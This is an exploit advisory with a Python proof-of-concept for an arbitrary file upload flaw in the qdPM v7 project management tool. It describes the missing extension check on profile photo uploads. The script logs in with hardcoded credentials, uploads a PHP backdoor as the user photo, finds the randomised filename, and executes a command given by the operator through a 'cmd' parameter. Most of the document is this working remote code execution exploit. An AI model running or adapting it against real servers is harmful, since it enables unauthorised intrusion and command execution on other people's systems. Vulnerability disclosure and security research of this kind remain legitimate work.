######################################################################################
# Exploit qdPM v.7 Arbitrary File upload
# Date: June 13th 2012
# Author: loneferret
# Version: 7
# Vendor Url: http://qdpm.net/
# Tested on: Winddows XP / XAMPP
######################################################################################
# Discovered by: loneferret
######################################################################################
# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.
# Vulnerability:
# Application does not verify the file's extension when uploading an image for a user's profile.
# Making it possible to upload a small php shell, and accessing it remotely.
# Note(s):
# One needs a valid user account to upload the file. (Client will do)
# No need to be authenticated to access the file.
# Uploading file:
# Once logged in, upload file here:
# Page: /qdPM/index.php/home/myAccount
# Access file:
# File can be found here:
# /qdPM/uploads/users/<filename>
#
# Note the filename will contain a random number. One need to
# to look at the source code from the browser to find it.
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />
----- python script -----
#!/usr/bin/python
import re, mechanize
import urllib, sys
print "\n[*] qdPM v.7 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
print "[*] Usage: poc.py <RHOST> <RCMD>"
exit(0)
rhost = sys.argv[1]
rcmd = sys.argv[2]
# Login into site
try:
print "[*] Loging in ."
br = mechanize.Browser()
br.open("http://%s/qdPM/index.php/home/login" % rhost)
assert br.viewing_html()
br.select_form(name="UsersForm")
br.select_form(nr=0)
br.form['login[email]'] = "loneferret@test.com"
br.form['login[password]'] = "123456"
print "[*] Hope this works"
br.submit()
except:
print "[*] Oups..."
exit(0)
# Upload malicious file
try:
print "[*] Uploading shell .."
br.open("http://%s/qdPM/home/myAccount" % rhost)
assert br.viewing_html()
br.select_form(name="UsersAccountForm")
br.select_form(nr=0)
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
br.submit(nr=0)
except:
print "[-] Upload didn't work."
exit(0)
# Get file name once saved
try:
br.select_form(name="UsersAccountForm")
for form in br.forms():
filename = form.controls[9].value
print "[*] Filename is now: " + filename
url = "http://%s/qdPM/uploads/users " % rhost
url += "/%s?cmd=%s" % (filename,rcmd)
print "[*] Executing command:\n"
resp = urllib.urlopen(url)
print resp.read()
except:
print "[-] Oups..."
exit(0)